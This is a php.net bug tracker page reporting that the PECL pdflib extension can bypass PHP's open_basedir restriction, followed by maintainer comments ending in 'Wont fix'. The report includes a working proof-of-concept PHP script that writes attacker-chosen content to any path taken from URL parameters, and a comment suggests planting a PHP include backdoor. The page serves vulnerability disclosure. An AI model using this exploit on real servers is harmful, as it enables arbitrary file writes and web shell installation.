php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #58933 Pdflib open_basedir bypass
Submitted: 2009-11-03 16:16 UTC Modified: 2016-08-25 13:40 UTC
From: r3d dot w0rm at yahoo dot com Assigned:
Status: Wont fix Package: pdflib (PECL)
PHP Version: 5.3.0 OS: Linux,Windows
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: r3d dot w0rm at yahoo dot com
New email:
PHP Version: OS:

 

 [2009-11-03 16:16 UTC] r3d dot w0rm at yahoo dot com 
Description:
------------
Via this bug , attacker can save a file in path that not allowed in open_basedir .

Reproduce code:
---------------
<?php
// Author : Sina Yazdanmehr (R3d.W0rm) ; Our Site : http://IrCrash.com
if(!extension_loaded('pdf')){
   die('pdf extension required .');   
}else{
    $__PATH = $_GET['p']; /*The path that u want save file in .ex: /etc/file.php*/
    $__VALUE = $_GET['v']; /*The text that u want save in file .ex: <?php include $_GET[f];?>*/
    if(!isset($__PATH,$__VALUE)){
        die('/expl.php?p=[path_u_want_save_file]/[file_name]&v=[value_u_want_save_in_file]');
    }
    $__IRCRASH = pdf_new();
    pdf_open_file($__IRCRASH,$__PATH);
    pdf_begin_page($__IRCRASH,612,792);
    pdf_add_note($__IRCRASH,100,650,200,750,$__VALUE,'R3d.W0rm','note',0);
    pdf_end_page($__IRCRASH);
    pdf_close($__IRCRASH);
    pdf_delete($__IRCRASH);
    print('<p>IrCrash Security Team .</p>');
    print('<p>' . $__PATH . "\n"  . 'created .</p>');}
?>

Expected result:
----------------
When attacker run this code , a file in a path that attacker input in `p` in url , whith value that attacker input in `v` in url.

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2009-11-03 16:20 UTC] r3d dot w0rm at yahoo dot com 
Sina Yazdanmehr (R3d.W0rm) From IrCrash security team
 [2016-08-04 14:41 UTC] cmb@php.net
-Status: Open +Status: Feedback -Assigned To: +Assigned To: cmb
 [2016-08-04 14:41 UTC] cmb@php.net 
According to the changelog[1] this issue appears to have been
fixed as of pdflib 2.1.8:

- added php_check_open_basedir

Or can you still reproduce the bug?

[1] <http://pecl.php.net/package-changelog.php?package=pdflib&release=2.1.8>
 [2016-08-04 15:06 UTC] rjs@php.net 
The fix of pdflib 2.1.8 is no longer activated.

The problem is that is not sufficient to check the API's that have a filename parameter. PDFlib has several API's wich allow to pass filenames in "option lists". These cannot be checked by the wrapper code.

So the only solution would be to add a functionality similar to php_check_open_basedir() to the PDFlib library itself. This is not planed in the moment.
 [2016-08-04 15:37 UTC] cmb@php.net
-Status: Feedback +Status: Open -Assigned To: cmb +Assigned To:
 [2016-08-25 13:40 UTC] rjs@php.net
-Status: Open +Status: Wont fix
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Fri Dec 27 05:01:27 2024 UTC